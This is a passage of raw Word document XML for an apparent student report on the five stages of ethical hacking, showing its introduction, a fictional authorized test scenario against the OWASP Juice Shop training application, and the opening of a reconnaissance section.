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75984039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79BB091" w14:textId="3BC838B9" w:rsidR="00DC4005" w:rsidRPr="00FA5B3B" w:rsidRDefault="00DC4005">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00FA5B3B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D198AC" wp14:editId="45DACA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FCB0C" w14:textId="77777777" w:rsidR="00DC4005" w:rsidRPr="00DC4005" w:rsidRDefault="00DC4005" w:rsidP="00DC400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Han22080221</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="72FD4953" w14:textId="77777777" w:rsidR="00DC4005" w:rsidRPr="00DC4005" w:rsidRDefault="00DC4005" w:rsidP="00DC400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Han22080221</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="79F2D74E" w14:textId="77777777" w:rsidR="00DC4005" w:rsidRPr="00DC4005" w:rsidRDefault="00DC4005" w:rsidP="00DC400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Han22080221</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="27E3567D" w14:textId="11FE2797" w:rsidR="00DC4005" w:rsidRPr="00DC4005" w:rsidRDefault="00DC400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DC4005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HAN</w:t>
                                  </w:r>
                                  <w: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220802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779D2E0" w14:textId="2F5B9FF7" w:rsidR="00DC4005" w:rsidRDefault="009631E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  <w:t>The 5 stages of ethical hacking</w:t>
                                      </w:r>
                                    </w:p>
                                  </w:sdtContent>
                                </w:sdt>
                                <w:p w14:paraId="49EF24F8" w14:textId="77777777" w:rsidR="00DC4005" w:rsidRDefault="00DC4005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D198AC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15FCB0C" w14:textId="77777777" w:rsidR="00DC4005" w:rsidRPr="00DC4005" w:rsidRDefault="00DC4005" w:rsidP="00DC400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Han22080221</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="72FD4953" w14:textId="77777777" w:rsidR="00DC4005" w:rsidRPr="00DC4005" w:rsidRDefault="00DC4005" w:rsidP="00DC400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Han22080221</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="79F2D74E" w14:textId="77777777" w:rsidR="00DC4005" w:rsidRPr="00DC4005" w:rsidRDefault="00DC4005" w:rsidP="00DC400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Han22080221</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="27E3567D" w14:textId="11FE2797" w:rsidR="00DC4005" w:rsidRPr="00DC4005" w:rsidRDefault="00DC400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400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AN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20802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779D2E0" w14:textId="2F5B9FF7" w:rsidR="00DC4005" w:rsidRDefault="009631E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The 5 stages of ethical hacking</w:t>
                                </w:r>
                              </w:p>
                            </w:sdtContent>
                          </w:sdt>
                          <w:p w14:paraId="49EF24F8" w14:textId="77777777" w:rsidR="00DC4005" w:rsidRDefault="00DC4005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49EBE5" w14:textId="75A4511A" w:rsidR="00DC4005" w:rsidRPr="00FA5B3B" w:rsidRDefault="00DC4005">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:caps/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
              <w:sz w:val="64"/>
              <w:szCs w:val="64"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00FA5B3B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/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p w14:paraId="73CD089E" w14:textId="25A99E4A" w:rsidR="007F240D" w:rsidRPr="00FA5B3B" w:rsidRDefault="00C422A7" w:rsidP="00DC4005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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D9319" w14:textId="3B57CF61" w:rsidR="00C56F1A" w:rsidRPr="00FA5B3B" w:rsidRDefault="001C4622" w:rsidP="00C422A7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Ethical hacking is </w:t>
      </w:r>
      <w:r w:rsidR="008A62B5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>practice of detecting vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="001F5FD3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidR="00872DC3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> computers</w:t>
      </w:r>
      <w:r w:rsidR="001F5FD3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems, applications</w:t>
      </w:r>
      <w:r w:rsidR="00872DC3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and networks </w:t>
      </w:r>
      <w:r w:rsidR="00B74A16" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and bypassing</w:t>
      </w:r>
      <w:r w:rsidR="00872DC3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> organization</w:t>
      </w:r>
      <w:r w:rsidR="00B74A16" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r w:rsidR="00360330" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">infrastructure to identify potential threats within </w:t>
      </w:r>
      <w:r w:rsidR="00A1421E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the organization</w:t>
      </w:r>
      <w:r w:rsidR="00360330" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00872DC3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443922" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:r w:rsidR="00207505" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ethical hack</w:t>
      </w:r>
      <w:r w:rsidR="00A1421E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidR="00DD4790" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, authorized by the organization,</w:t>
      </w:r>
      <w:r w:rsidR="00A1421E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> aims to detect </w:t>
      </w:r>
      <w:r w:rsidR="006566F2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vulnerabilities,</w:t>
      </w:r>
      <w:r w:rsidR="00EC2BFD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0E06EF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00CF39E0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>notify</w:t>
      </w:r>
      <w:r w:rsidR="000961C5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> organizations</w:t>
      </w:r>
      <w:r w:rsidR="00AE0D79" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that</w:t>
      </w:r>
      <w:r w:rsidR="000961C5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="00AE0D79" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hey</w:t>
      </w:r>
      <w:r w:rsidR="000961C5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> protect their systems against malicious actor</w:t>
      </w:r>
      <w:r w:rsidR="0028439B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s.</w:t>
      </w:r>
      <w:r w:rsidR="008F1EA7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AC2958" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">In this report, the 5 </w:t>
      </w:r>
      <w:r w:rsidR="003359FA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>phases</w:t>
      </w:r>
      <w:r w:rsidR="00AC2958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976781" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">of ethical hacking will be </w:t>
      </w:r>
      <w:r w:rsidR="00217E00" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>explored</w:t>
      </w:r>
      <w:r w:rsidR="00976781" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> along </w:t>
      </w:r>
      <w:r w:rsidR="00FA536C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">with examples and tools used </w:t>
      </w:r>
      <w:r w:rsidR="006A0AE3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">in each </w:t>
      </w:r>
      <w:r w:rsidR="003359FA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>phase</w:t>
      </w:r>
      <w:r w:rsidR="006A0AE3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Then</w:t>
      </w:r>
      <w:r w:rsidR="00110124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217E00" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the report will shift to discuss the ethics</w:t>
      </w:r>
      <w:r w:rsidR="00573ADB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> surrounding ethical hacking. This</w:t>
      </w:r>
      <w:r w:rsidR="00C56F1A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> report </w:t>
      </w:r>
      <w:r w:rsidR="00B47C6D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">aims </w:t>
      </w:r>
      <w:r w:rsidR="007535E9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to give a comprehensive understanding of</w:t>
      </w:r>
      <w:r w:rsidR="00B47C6D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="006E36C5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">stages </w:t>
      </w:r>
      <w:r w:rsidR="00856745" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00A65224" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ethical hacking as well as the ethics of a penetration tester.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3329596B" w14:textId="553BCD62" w:rsidR="00573ADB" w:rsidRPr="00FA5B3B" w:rsidRDefault="00014D6C" w:rsidP="00014D6C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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">2.The 5 </w:t>
      </w:r>
      <w:r w:rsidR="007E2459" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>phases</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> of ethical hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A703A45" w14:textId="7DA492EB" w:rsidR="001201C0" w:rsidRPr="00FA5B3B" w:rsidRDefault="007E2459" w:rsidP="001201C0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The 5 phases of ethical hacking will be </w:t>
      </w:r>
      <w:r w:rsidR="00A14B22" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">discussed in the </w:t>
      </w:r>
      <w:r w:rsidR="007232EF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidR="00A14B22" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of exploiting </w:t>
      </w:r>
      <w:r w:rsidR="00612603" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="0017054D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="002B2FBA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP</w:t>
      </w:r>
      <w:r w:rsidR="002A53DB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EA036A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>juice shop application</w:t>
      </w:r>
      <w:r w:rsidR="0017054D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00907250" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> its</w:t>
      </w:r>
      <w:r w:rsidR="0017054D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r w:rsidR="00EA036A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> with technical methods and some aspects of social engineering.</w:t>
      </w:r>
      <w:r w:rsidR="007232EF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BA1F96" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a fictional scenario where target </w:t>
      </w:r>
      <w:r w:rsidR="00D14CAA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">organization agreed </w:t>
      </w:r>
      <w:r w:rsidR="00DD7346" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00612603" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> test within</w:t>
      </w:r>
      <w:r w:rsidR="00DD7346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612603" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00DD7346" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> scope of </w:t>
      </w:r>
      <w:r w:rsidR="00612603" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>technical exploitation and social engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246FB748" w14:textId="082A2112" w:rsidR="00014D6C" w:rsidRPr="00FA5B3B" w:rsidRDefault="00014D6C" w:rsidP="00014D6C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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00001D3E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E84A7B" w14:textId="385B65D0" w:rsidR="009F0255" w:rsidRPr="00FA5B3B" w:rsidRDefault="0040281F" w:rsidP="00FC3B0C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>Before attempting to access the system</w:t>
      </w:r>
      <w:r w:rsidR="00FE2F2D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, t</w:t>
      </w:r>
      <w:r w:rsidR="00331770" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">he attacker must first </w:t>
      </w:r>
      <w:r w:rsidR="006221F8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidR="00331770" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> as much information as possible about the target</w:t>
      </w:r>
      <w:r w:rsidR="00BB514D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0078677F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837008" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Reconnaissance is the preparation phase</w:t>
      </w:r>
      <w:r w:rsidR="006A0B3E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the attacker </w:t>
      </w:r>
      <w:r w:rsidR="006221F8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">gathers </w:t>
      </w:r>
      <w:r w:rsidR="00ED74B6" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="0040163D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> about the organization </w:t>
      </w:r>
      <w:r w:rsidR="009F0255" w:rsidRPr="00FA5B3B">
        <w:rPr>
